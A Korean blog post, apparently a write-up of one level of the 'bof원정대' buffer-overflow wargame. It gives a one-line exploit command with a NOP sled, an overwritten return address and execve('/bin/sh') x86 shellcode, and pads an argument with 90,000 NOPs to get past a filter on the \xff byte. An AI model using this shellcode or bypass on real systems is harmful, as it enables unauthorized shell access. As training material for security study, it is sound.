티스토리 뷰
해답 :
`python -c 'print "\x90"*44+"\x98\x9c\xfe\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` `python -c 'print "\x90"*90000'
이번 문제의 요점은 ff 부분을 차단하는 것에 대한 우회였습니다.
우회하는 방법은 의외로 간단합니다. argv인자 값에 들어가는 데이터의 크기를 늘려서 스택을 더욱 더 쌓아올려
ff를 다른 주소로 변경하는 방법입니다.
저는 이 것을 해결하기 위해 argv[3]에 90000개의 90를 집어넣었고 그 것을 이용해 주소를 fe로 만들었습니다.
'문제풀이 > bof원정대' 카테고리의 다른 글
bof원정대 darkknight -> bugbear (0) | 2016.08.18 |
---|---|
bof원정대 golem -> darkknight (0) | 2016.08.18 |
bof원정대 orge -> troll (0) | 2016.08.15 |
bof 원정대 darkelf -> orge (0) | 2016.08.15 |
bof 원정대 wolfman -> darkelf (0) | 2016.08.15 |
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- breakpoint
- Intel
- 레거시 드라이버
- 모듈
- BP
- 드라이버
- backdoor
- LKM
- 리눅스 모듈
- VMware
- vmware 오류
- IRP
- gdb 명령어
- 변환
- DriverEntry
- gdb intel 변환
- 디바이스
- rootkit
- module
- gdb intel
- PNP 드라이버
- vmware cannot connect to the virtual machine
- GDB
- gdb명령어
- 백도어
- 루트킷
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
글 보관함